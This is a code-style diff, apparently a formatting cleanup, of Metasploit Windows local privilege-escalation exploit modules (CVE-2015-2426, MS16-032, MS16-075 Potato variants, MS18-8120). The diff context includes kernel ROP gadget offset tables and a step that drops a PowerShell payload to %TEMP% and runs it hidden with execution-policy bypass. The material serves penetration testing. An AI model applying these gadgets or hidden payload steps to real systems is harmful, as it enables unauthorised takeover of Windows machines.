+            ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/'],
+            ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=369'],
+            ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=480']
+          ],
+          'DisclosureDate' => '2015-07-11',
+          'DefaultTarget' => 0
+        }
+      )
+    )
   end
 
   def patch_win32k_offsets(dll)
@@ -113,106 +117,106 @@ class MetasploitModule < Msf::Exploit::Local
       case version
       when '6.3.9600.17393'
         {
-          'info_leak'           => 0x3cf00,
-          'pop_rax_ret'         => 0x19fab,  # pop rax # ret # 58 C3
-          'xchg_rax_rsp'        => 0x6121,   # xchg eax, esp # ret # 94 C3
-          'allocate_pool'       => 0x352220, # import entry nt!ExAllocatePoolWithTag
-          'pop_rcx_ret'         => 0x98156,  # pop rcx # ret # 59 C3
-          'deref_rax_into_rcx'  => 0xc432f,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
-          'mov_rax_into_rcx'    => 0xc4332,  # mov [rcx], rax # ret # 48 89 01 C3
-          'pop_rbx_ret'         => 0x14db,   # pop rbx # ret # 5B C3
-          'ret'                 => 0x6e314,  # ret C3
-          'mov_rax_r11_ret'     => 0x7018e,  # mov rax, r11 # ret # 49 8B C3 C3
-          'add_rax_rcx_ret'     => 0xee38f,  # add rax, rcx # ret # 48 03 C1 C3
-          'pop_rsp_ret'         => 0xbc8f,   # pop rsp # ret # 5c c3
+          'info_leak' => 0x3cf00,
+          'pop_rax_ret' => 0x19fab, # pop rax # ret # 58 C3
+          'xchg_rax_rsp' => 0x6121, # xchg eax, esp # ret # 94 C3
+          'allocate_pool' => 0x352220, # import entry nt!ExAllocatePoolWithTag
+          'pop_rcx_ret' => 0x98156, # pop rcx # ret # 59 C3
+          'deref_rax_into_rcx' => 0xc432f, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
+          'mov_rax_into_rcx' => 0xc4332, # mov [rcx], rax # ret # 48 89 01 C3
+          'pop_rbx_ret' => 0x14db, # pop rbx # ret # 5B C3
+          'ret' => 0x6e314, # ret C3
+          'mov_rax_r11_ret' => 0x7018e,  # mov rax, r11 # ret # 49 8B C3 C3
+          'add_rax_rcx_ret' => 0xee38f,  # add rax, rcx # ret # 48 03 C1 C3
+          'pop_rsp_ret' => 0xbc8f, # pop rsp # ret # 5c c3
           'xchg_rax_rsp_adjust' => 0x189a3a, # xchg esp, eax # sbb al, 0 # mov eax, ebx # add rsp, 20h # pop rbx # ret # 94 1C 00 8B C3 48 83 c4 20 5b c3
-          'chwnd_delete'        => 0x165010  # CHwndTargetProp::Delete
+          'chwnd_delete' => 0x165010 # CHwndTargetProp::Delete
         }
       when '6.3.9600.17630'
         {
-          'info_leak'           => 0x3d200,
-          'pop_rax_ret'         => 0x19e9b,  # pop rax # ret # 58 C3
-          'xchg_rax_rsp'        => 0x6024,   # xchg eax, esp # ret # 94 C3
-          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
-          'pop_rcx_ret'         => 0x84f4f,  # pop rcx # ret # 59 C3
-          'deref_rax_into_rcx'  => 0xc3f7f,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
-          'mov_rax_into_rcx'    => 0xc3f82,  # mov [rcx], rax # ret # 48 89 01 C3
-          'pop_rbx_ret'         => 0x14db,   # pop rbx # ret # 5B C3
-          'ret'                 => 0x14dc,   # ret C3
-          'mov_rax_r11_ret'     => 0x7034e,  # mov rax, r11 # ret # 49 8B C3 C3
-          'add_rax_rcx_ret'     => 0xed33b,  # add rax, rcx # ret # 48 03 C1 C3
-          'pop_rsp_ret'         => 0xbb93,   # pop rsp # ret # 5c c3
+          'info_leak' => 0x3d200,
+          'pop_rax_ret' => 0x19e9b, # pop rax # ret # 58 C3
+          'xchg_rax_rsp' => 0x6024, # xchg eax, esp # ret # 94 C3
+          'allocate_pool' => 0x351220, # import entry nt!ExAllocatePoolWithTag
+          'pop_rcx_ret' => 0x84f4f, # pop rcx # ret # 59 C3
+          'deref_rax_into_rcx' => 0xc3f7f, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
+          'mov_rax_into_rcx' => 0xc3f82, # mov [rcx], rax # ret # 48 89 01 C3
+          'pop_rbx_ret' => 0x14db, # pop rbx # ret # 5B C3
+          'ret' => 0x14dc, # ret C3
+          'mov_rax_r11_ret' => 0x7034e,  # mov rax, r11 # ret # 49 8B C3 C3
+          'add_rax_rcx_ret' => 0xed33b,  # add rax, rcx # ret # 48 03 C1 C3
+          'pop_rsp_ret' => 0xbb93, # pop rsp # ret # 5c c3
           'xchg_rax_rsp_adjust' => 0x17c78c, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
-          'chwnd_delete'        => 0x146EE0  # CHwndTargetProp::Delete
+          'chwnd_delete' => 0x146EE0 # CHwndTargetProp::Delete
         }
       when '6.3.9600.17694'
         {
-          'info_leak'           => 0x3d300,
-          'pop_rax_ret'         => 0x151f4,  # pop rax # ret # 58 C3
-          'xchg_rax_rsp'        => 0x600c,   # xchg eax, esp # ret # 94 C3
-          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
-          'pop_rcx_ret'         => 0x2cf10,  # pop rcx # ret # 59 C3
-          'deref_rax_into_rcx'  => 0xc3757,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
-          'mov_rax_into_rcx'    => 0xc375a,  # mov [rcx], rax # ret # 48 89 01 C3
-          'pop_rbx_ret'         => 0x6682,   # pop rbx # ret # 5B C3
-          'ret'                 => 0x6683,   # ret C3
-          'mov_rax_r11_ret'     => 0x7010e,  # mov rax, r11 # ret # 49 8B C3 C3
-          'add_rax_rcx_ret'     => 0xecd7b,  # add rax, rcx # ret # 48 03 C1 C3
-          'pop_rsp_ret'         => 0x71380,  # pop rsp # ret # 5c c3
+          'info_leak' => 0x3d300,
+          'pop_rax_ret' => 0x151f4, # pop rax # ret # 58 C3
+          'xchg_rax_rsp' => 0x600c, # xchg eax, esp # ret # 94 C3
+          'allocate_pool' => 0x351220, # import entry nt!ExAllocatePoolWithTag
+          'pop_rcx_ret' => 0x2cf10, # pop rcx # ret # 59 C3
+          'deref_rax_into_rcx' => 0xc3757, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
+          'mov_rax_into_rcx' => 0xc375a, # mov [rcx], rax # ret # 48 89 01 C3
+          'pop_rbx_ret' => 0x6682, # pop rbx # ret # 5B C3
+          'ret' => 0x6683, # ret C3
+          'mov_rax_r11_ret' => 0x7010e,  # mov rax, r11 # ret # 49 8B C3 C3
+          'add_rax_rcx_ret' => 0xecd7b,  # add rax, rcx # ret # 48 03 C1 C3
+          'pop_rsp_ret' => 0x71380, # pop rsp # ret # 5c c3
           'xchg_rax_rsp_adjust' => 0x178c84, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
-          'chwnd_delete'        => 0x1513D8  # CHwndTargetProp::Delete
+          'chwnd_delete' => 0x1513D8 # CHwndTargetProp::Delete
         }
       when '6.3.9600.17796'
         {
-          'info_leak'           => 0x3d000,
-          'pop_rax_ret'         => 0x19e4f,  # pop rax # ret # 58 C3
-          'xchg_rax_rsp'        => 0x5f64,   # xchg eax, esp # ret # 94 C3
-          'allocate_pool'       => 0x352220, # import entry nt!ExAllocatePoolWithTag
-          'pop_rcx_ret'         => 0x97a5e,  # pop rcx # ret # 59 C3
-          'deref_rax_into_rcx'  => 0xc3aa7,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
-          'mov_rax_into_rcx'    => 0xc3aaa,  # mov [rcx], rax # ret # 48 89 01 C3
-          'pop_rbx_ret'         => 0x1B20,   # pop rbx # ret # 5B C3
-          'ret'                 => 0x1B21,   # ret C3
-          'mov_rax_r11_ret'     => 0x7010e,  # mov rax, r11 # ret # 49 8B C3 C3
-          'add_rax_rcx_ret'     => 0xecf8b,  # add rax, rcx # ret # 48 03 C1 C3
-          'pop_rsp_ret'         => 0x29fd3,  # pop rsp # ret # 5c c3
+          'info_leak' => 0x3d000,
+          'pop_rax_ret' => 0x19e4f, # pop rax # ret # 58 C3
+          'xchg_rax_rsp' => 0x5f64, # xchg eax, esp # ret # 94 C3
+          'allocate_pool' => 0x352220, # import entry nt!ExAllocatePoolWithTag
+          'pop_rcx_ret' => 0x97a5e, # pop rcx # ret # 59 C3
+          'deref_rax_into_rcx' => 0xc3aa7, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
+          'mov_rax_into_rcx' => 0xc3aaa, # mov [rcx], rax # ret # 48 89 01 C3
+          'pop_rbx_ret' => 0x1B20, # pop rbx # ret # 5B C3
+          'ret' => 0x1B21, # ret C3
+          'mov_rax_r11_ret' => 0x7010e,  # mov rax, r11 # ret # 49 8B C3 C3
+          'add_rax_rcx_ret' => 0xecf8b,  # add rax, rcx # ret # 48 03 C1 C3
+          'pop_rsp_ret' => 0x29fd3, # pop rsp # ret # 5c c3
           'xchg_rax_rsp_adjust' => 0x1789e4, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
-          'chwnd_delete'        => 0x150F58  # CHwndTargetProp::Delete
+          'chwnd_delete' => 0x150F58 # CHwndTargetProp::Delete
 
         }
       when '6.3.9600.17837'
         {
-          'info_leak'           => 0x3d800,
-          'pop_rax_ret'         => 0x1a51f,  # pop rax # ret # 58 C3
-          'xchg_rax_rsp'        => 0x62b4,   # xchg eax, esp # ret # 94 C3
-          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
-          'pop_rcx_ret'         => 0x97a4a,  # pop rcx # ret # 59 C3
-          'deref_rax_into_rcx'  => 0xc3687,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
-          'mov_rax_into_rcx'    => 0xc368a,  # mov [rcx], rax # ret # 48 89 01 C3
-          'pop_rbx_ret'         => 0x14db,   # pop rbx # ret # 5B C3
-          'ret'                 => 0x14dc,   # ret C3
-          'mov_rax_r11_ret'     => 0x94871,  # mov rax, r11 # ret # 49 8B C3 C3
-          'add_rax_rcx_ret'     => 0xecbdb,  # add rax, rcx # ret # 48 03 C1 C3
-          'pop_rsp_ret'         => 0xbd2c,   # pop rsp # ret # 5c c3
+          'info_leak' => 0x3d800,
+          'pop_rax_ret' => 0x1a51f, # pop rax # ret # 58 C3
+          'xchg_rax_rsp' => 0x62b4, # xchg eax, esp # ret # 94 C3
+          'allocate_pool' => 0x351220, # import entry nt!ExAllocatePoolWithTag
+          'pop_rcx_ret' => 0x97a4a, # pop rcx # ret # 59 C3
+          'deref_rax_into_rcx' => 0xc3687, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
+          'mov_rax_into_rcx' => 0xc368a, # mov [rcx], rax # ret # 48 89 01 C3
+          'pop_rbx_ret' => 0x14db, # pop rbx # ret # 5B C3
+          'ret' => 0x14dc, # ret C3
+          'mov_rax_r11_ret' => 0x94871,  # mov rax, r11 # ret # 49 8B C3 C3
+          'add_rax_rcx_ret' => 0xecbdb,  # add rax, rcx # ret # 48 03 C1 C3
+          'pop_rsp_ret' => 0xbd2c, # pop rsp # ret # 5c c3
           'xchg_rax_rsp_adjust' => 0x15e84c, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
-          'chwnd_delete'        => 0x15A470  # CHwndTargetProp::Delete
+          'chwnd_delete' => 0x15A470 # CHwndTargetProp::Delete
         }
       when '6.3.9600.17915'
         {
-          'info_leak'           => 0x3d800,
-          'pop_rax_ret'         => 0x1A4EF,  # pop rax # ret # 58 C3
-          'xchg_rax_rsp'        => 0x62CC,   # xchg eax, esp # ret # 94 C3
-          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
-          'pop_rcx_ret'         => 0x9765A,  # pop rcx # ret # 59 C3
-          'deref_rax_into_rcx'  => 0xC364F,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
-          'mov_rax_into_rcx'    => 0xC3652,  # mov [rcx], rax # ret # 48 89 01 C3
-          'pop_rbx_ret'         => 0x14DB,   # pop rbx # ret # 5B C3
-          'ret'                 => 0x14DC,   # ret # C3
-          'mov_rax_r11_ret'     => 0x7060e,  # mov rax, r11 # ret # 49 8B C3 C3
-          'add_rax_rcx_ret'     => 0xECDCB,  # add rax, rcx # 48 03 C1 C3
-          'pop_rsp_ret'         => 0xbe33,   # pop rsp # ret # 5c c3
+          'info_leak' => 0x3d800,
+          'pop_rax_ret' => 0x1A4EF, # pop rax # ret # 58 C3
+          'xchg_rax_rsp' => 0x62CC, # xchg eax, esp # ret # 94 C3
+          'allocate_pool' => 0x351220, # import entry nt!ExAllocatePoolWithTag
+          'pop_rcx_ret' => 0x9765A, # pop rcx # ret # 59 C3
+          'deref_rax_into_rcx' => 0xC364F, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
+          'mov_rax_into_rcx' => 0xC3652, # mov [rcx], rax # ret # 48 89 01 C3
+          'pop_rbx_ret' => 0x14DB, # pop rbx # ret # 5B C3
+          'ret' => 0x14DC, # ret # C3
+          'mov_rax_r11_ret' => 0x7060e,  # mov rax, r11 # ret # 49 8B C3 C3
+          'add_rax_rcx_ret' => 0xECDCB,  # add rax, rcx # 48 03 C1 C3
+          'pop_rsp_ret' => 0xbe33, # pop rsp # ret # 5c c3
           'xchg_rax_rsp_adjust' => 0x15e5fc, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
-          'chwnd_delete'        => 0x15A220  # CHwndTargetProp::Delete
+          'chwnd_delete' => 0x15A220 # CHwndTargetProp::Delete
         }
       else
         nil
@@ -236,23 +240,23 @@ class MetasploitModule < Msf::Exploit::Local
       case version
       when '6.3.9600.17415'
         {
-          'set_cr4'                => 0x38a3cc, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
-          'allocate_pool_with_tag' => 0x2a3a50  # ExAllocatePoolWithTag
+          'set_cr4' => 0x38a3cc, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
+          'allocate_pool_with_tag' => 0x2a3a50 # ExAllocatePoolWithTag
         }
       when '6.3.9600.17630'
         {
-          'set_cr4'                => 0x38A3BC, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
-          'allocate_pool_with_tag' => 0x2A3A50  # ExAllocatePoolWithTag
+          'set_cr4' => 0x38A3BC, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
+          'allocate_pool_with_tag' => 0x2A3A50 # ExAllocatePoolWithTag
         }
       when '6.3.9600.17668'
         {
-          'set_cr4'                => 0x38A3BC, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
-          'allocate_pool_with_tag' => 0x2A3A50  # ExAllocatePoolWithTag
+          'set_cr4' => 0x38A3BC, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
+          'allocate_pool_with_tag' => 0x2A3A50 # ExAllocatePoolWithTag
         }
       when '6.3.9600.17936'
         {
-          'set_cr4'                => 0x3863bc, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
-          'allocate_pool_with_tag' => 0x29FA50  # ExAllocatePoolWithTag
+          'set_cr4' => 0x3863bc, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
+          'allocate_pool_with_tag' => 0x29FA50 # ExAllocatePoolWithTag
         }
       else
         nil
@@ -264,6 +268,7 @@ class MetasploitModule < Msf::Exploit::Local
     file_path = expand_path('%windir%') << '\\system32\\atmfd.dll'
     major, minor, build, revision, branch = file_version(file_path)
     return nil if major.nil?
+
     ver = "#{major}.#{minor}.#{build}.#{revision}"
     vprint_status("atmfd.dll file version: #{ver} branch: #{branch}")
 
@@ -274,6 +279,7 @@ class MetasploitModule < Msf::Exploit::Local
     file_path = expand_path('%windir%') << '\\system32\\win32k.sys'
     major, minor, build, revision, branch = file_version(file_path)
     return nil if major.nil?
+
     ver = "#{major}.#{minor}.#{build}.#{revision}"
     vprint_status("win32k.sys file version: #{ver} branch: #{branch}")
 
@@ -284,6 +290,7 @@ class MetasploitModule < Msf::Exploit::Local
     file_path = expand_path('%windir%') << '\\system32\\ntoskrnl.exe'
     major, minor, build, revision, branch = file_version(file_path)
     return nil if major.nil?
+
     ver = "#{major}.#{minor}.#{build}.#{revision}"
     vprint_status("ntoskrnl.exe file version: #{ver} branch: #{branch}")
 
@@ -357,7 +364,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     begin
       print_status('Launching notepad to host the exploit...')
-      notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
+      notepad_process = client.sys.process.execute('notepad.exe', nil, { 'Hidden' => true })
       process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
       print_good("Process #{process.pid} launched.")
     rescue Rex::Post::Meterpreter::RequestError

--- a/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
+++ b/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
@@ -14,54 +14,54 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Powershell
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'          => 'MS16-032 Secondary Logon Handle Privilege Escalation',
-      'Description'   => %q{
-        This module exploits the lack of sanitization of standard handles in Windows' Secondary
-        Logon Service.  The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12
-        32 and 64 bit.  This module will only work against those versions of Windows with
-        Powershell 2.0 or later and systems with two or more CPU cores.
-      },
-       'License'       => BSD_LICENSE,
-       'Author'        =>
-         [
-           'James Forshaw', # twitter.com/tiraniddo
-           'b33f',          # @FuzzySec, http://www.fuzzysecurity.com'
-           'khr0x40sh'
-         ],
-       'References'    =>
-         [
-           [ 'MS', 'MS16-032'],
-           [ 'CVE', '2016-0099'],
-           [ 'URL', 'https://twitter.com/FuzzySec/status/723254004042612736' ],
-           [ 'URL', 'https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html']
-         ],
-        'DefaultOptions' =>
-          {
-            'WfsDelay' => 30,
-            'EXITFUNC' => 'thread'
-          },
+    super(
+      update_info(
+        info,
+        'Name' => 'MS16-032 Secondary Logon Handle Privilege Escalation',
+        'Description' => %q{
+          This module exploits the lack of sanitization of standard handles in Windows' Secondary
+          Logon Service.  The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12
+          32 and 64 bit.  This module will only work against those versions of Windows with
+          Powershell 2.0 or later and systems with two or more CPU cores.
+        },
+        'License' => BSD_LICENSE,
+        'Author' => [
+          'James Forshaw', # twitter.com/tiraniddo
+          'b33f', # @FuzzySec, http://www.fuzzysecurity.com'
+          'khr0x40sh'
+        ],
+        'References' => [
+          [ 'MS', 'MS16-032'],
+          [ 'CVE', '2016-0099'],
+          [ 'URL', 'https://twitter.com/FuzzySec/status/723254004042612736' ],
+          [ 'URL', 'https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html']
+        ],
+        'DefaultOptions' => {
+          'WfsDelay' => 30,
+          'EXITFUNC' => 'thread'
+        },
         'DisclosureDate' => '2016-03-21',
-        'Platform'      => [ 'win' ],
-        'SessionTypes'  => [ 'meterpreter' ],
-        'Targets'        =>
-          [
-            # Tested on (32 bits):
-            # * Windows 7 SP1
-            [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
-            # Tested on (64 bits):
-            # * Windows 7 SP1
-            # * Windows 8
-            # * Windows 2012
-            [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
-          ],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'Targets' => [
+          # Tested on (32 bits):
+          # * Windows 7 SP1
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          # Tested on (64 bits):
+          # * Windows 7 SP1
+          # * Windows 8
+          # * Windows 2012
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+        ],
         'DefaultTarget' => 0
-      ))
+      )
+    )
 
     register_advanced_options(
       [
         OptString.new('W_PATH', [false, 'Where to write temporary powershell file', nil]),
-      ])
+      ]
+    )
   end
 
   def check
@@ -110,19 +110,19 @@ class MetasploitModule < Msf::Exploit::Local
 
     psh_payload = compress_script(psh_payload)
 
-    @upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".ps1"
+    @upfile = Rex::Text.rand_text_alpha((rand(8) + 6)) + ".ps1"
     path = datastore['W_PATH'] || expand_path('%TEMP%')
     @upfile = "#{path}\\#{@upfile}"
-    fd = session.fs.file.new(@upfile,"wb")
+    fd = session.fs.file.new(@upfile, "wb")
     print_status("Writing payload file, #{@upfile}...")
     fd.write(psh_payload)
     fd.close
     psh_cmd = " -exec Bypass -nonI -window Hidden #{@upfile}"
 
-    #lpAppName
-    ms16_032.gsub!("$cmd","\"#{cmdstr}\"")
-    #lpcommandLine - capped at 1024b
-    ms16_032.gsub!("$args1","\"#{psh_cmd}\"")
+    # lpAppName
+    ms16_032.gsub!("$cmd", "\"#{cmdstr}\"")
+    # lpcommandLine - capped at 1024b
+    ms16_032.gsub!("$args1", "\"#{psh_cmd}\"")
     end_flag = Rex::Text.rand_text_alphanumeric(32)
     ms16_032.gsub!("$end", end_flag)
 
@@ -157,7 +157,7 @@ class MetasploitModule < Msf::Exploit::Local
         'Channelized' => true
       })
 
-      while(d = r.channel.read)
+      while (d = r.channel.read)
         print(d)
         break if d.include? end_flag
       end
@@ -165,7 +165,6 @@ class MetasploitModule < Msf::Exploit::Local
       r.close
 
       print_good("Executed on target machine.")
-
     rescue
       print_error("An error occurred executing the script.")
     end

--- a/modules/exploits/windows/local/ms16_075_reflection.rb
+++ b/modules/exploits/windows/local/ms16_075_reflection.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = NormalRanking
 
@@ -13,51 +12,51 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::FileInfo
   include Msf::Post::Windows::ReflectiveDLLInjection
 
-  def initialize(info={})
-    super(update_info(info, {
-      'Name'           => 'Windows Net-NTLMv2 Reflection DCOM/RPC',
-      'Description'    => %q(
-        Module utilizes the Net-NTLMv2 reflection between DCOM/RPC
-        to achieve a SYSTEM handle for elevation of privilege. Currently the module
-        does not spawn as SYSTEM, however once achieving a shell, one can easily
-        use incognito to impersonate the token.
-      ),
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'FoxGloveSec', # the original Potato exploit
-          'breenmachine', # Rotten Potato NG!
-          'Mumbai' # Austin : port of RottenPotato for reflection & quick module
-        ],
-      'Arch'           => [ARCH_X86, ARCH_X64],
-      'Platform'       => 'win',
-      'SessionTypes'   => ['meterpreter'],
-      'DefaultOptions' =>
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
         {
-          'EXITFUNC' => 'none',
-          'WfsDelay' => '20'
-        },
-      'Targets'        =>
-        [
-          ['Automatic', {}],
-          ['Windows x86', { 'Arch' => ARCH_X86 }],
-          ['Windows x64', { 'Arch' => ARCH_X64 }]
-        ],
-      'Payload'         =>
-        {
-          'DisableNops' => true
-        },
-      'References'      =>
-        [
-          ['MSB', 'MS16-075'],
-          ['CVE', '2016-3225'],
-          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],
-          ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],
-          ['URL', 'https://github.com/breenmachine/RottenPotatoNG']
-        ],
-      'DisclosureDate' => '2016-01-16',
-      'DefaultTarget'  => 0
-    }))
+          'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC',
+          'Description' => %q{
+            Module utilizes the Net-NTLMv2 reflection between DCOM/RPC
+            to achieve a SYSTEM handle for elevation of privilege. Currently the module
+            does not spawn as SYSTEM, however once achieving a shell, one can easily
+            use incognito to impersonate the token.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'FoxGloveSec', # the original Potato exploit
+            'breenmachine', # Rotten Potato NG!
+            'Mumbai' # Austin : port of RottenPotato for reflection & quick module
+          ],
+          'Arch' => [ARCH_X86, ARCH_X64],
+          'Platform' => 'win',
+          'SessionTypes' => ['meterpreter'],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'none',
+            'WfsDelay' => '20'
+          },
+          'Targets' => [
+            ['Automatic', {}],
+            ['Windows x86', { 'Arch' => ARCH_X86 }],
+            ['Windows x64', { 'Arch' => ARCH_X64 }]
+          ],
+          'Payload' => {
+            'DisableNops' => true
+          },
+          'References' => [
+            ['MSB', 'MS16-075'],
+            ['CVE', '2016-3225'],
+            ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],
+            ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],
+            ['URL', 'https://github.com/breenmachine/RottenPotatoNG']
+          ],
+          'DisclosureDate' => '2016-01-16',
+          'DefaultTarget' => 0
+        }
+      )
+    )
   end
 
   def assign_target
@@ -96,6 +95,7 @@ class MetasploitModule < Msf::Exploit::Local
     if privs.include?('SeImpersonatePrivilege')
       return Exploit::CheckCode::Appears
     end
+
     return Exploit::CheckCode::Safe
   end
 

--- a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
+++ b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
@@ -26,41 +26,36 @@ class MetasploitModule < Msf::Exploit::Local
             versions of Windows Server 2019 are not vulnerable.
           },
           'License' => MSF_LICENSE,
-          'Author' =>
-    [
-      'FoxGloveSec', # the original Potato exploit
-      'breenmachine', # Rotten Potato NG!
-      'decoder', # Lonely / Juicy Potato
-      'ohpe', # Juicy Potato
-      'phra', # MSF Module
-      'lupman' # MSF Module
-    ],
+          'Author' => [
+            'FoxGloveSec', # the original Potato exploit
+            'breenmachine', # Rotten Potato NG!
+            'decoder', # Lonely / Juicy Potato
+            'ohpe', # Juicy Potato
+            'phra', # MSF Module
+            'lupman' # MSF Module
+          ],
           'Arch' => [ARCH_X86, ARCH_X64],
           'Platform' => 'win',
           'SessionTypes' => ['meterpreter'],
-          'DefaultOptions' =>
-    {
-      'EXITFUNC' => 'none',
-      'WfsDelay' => '20'
-    },
-          'Targets' =>
-    [
-      ['Automatic', {}]
-    ],
-          'Payload' =>
-    {
-      'DisableNops' => true
-    },
-          'References' =>
-    [
-      ['MSB', 'MS16-075'],
-      ['CVE', '2016-3225'],
-      ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],
-      ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],
-      ['URL', 'https://github.com/breenmachine/RottenPotatoNG'],
-      ['URL', 'https://decoder.cloud/2017/12/23/the-lonely-potato/'],
-      ['URL', 'https://ohpe.it/juicy-potato/']
-    ],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'none',
+            'WfsDelay' => '20'
+          },
+          'Targets' => [
+            ['Automatic', {}]
+          ],
+          'Payload' => {
+            'DisableNops' => true
+          },
+          'References' => [
+            ['MSB', 'MS16-075'],
+            ['CVE', '2016-3225'],
+            ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],
+            ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],
+            ['URL', 'https://github.com/breenmachine/RottenPotatoNG'],
+            ['URL', 'https://decoder.cloud/2017/12/23/the-lonely-potato/'],
+            ['URL', 'https://ohpe.it/juicy-potato/']
+          ],
           'DisclosureDate' => '2016-01-16',
           'DefaultTarget' => 0
         }

--- a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb
+++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb
@@ -11,51 +11,53 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Priv
   include Msf::Exploit::FileDropper
 
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference',
+        'Description' => %q{
+          This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2
+          when the Win32k component fails to properly handle objects in memory. An attacker who
+          successfully exploited this vulnerability could run arbitrary code in kernel mode. An
+          attacker could then install programs; view, change, or delete data; or create new
+          accounts with full user rights.
 
-  def initialize(info={})
-    super(update_info(info,
-    'Name'            => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference',
-    'Description'     => %q{
-      This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2
-      when the Win32k component fails to properly handle objects in memory. An attacker who
-      successfully exploited this vulnerability could run arbitrary code in kernel mode. An
-      attacker could then install programs; view, change, or delete data; or create new
-      accounts with full user rights.
-
-      This module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64.
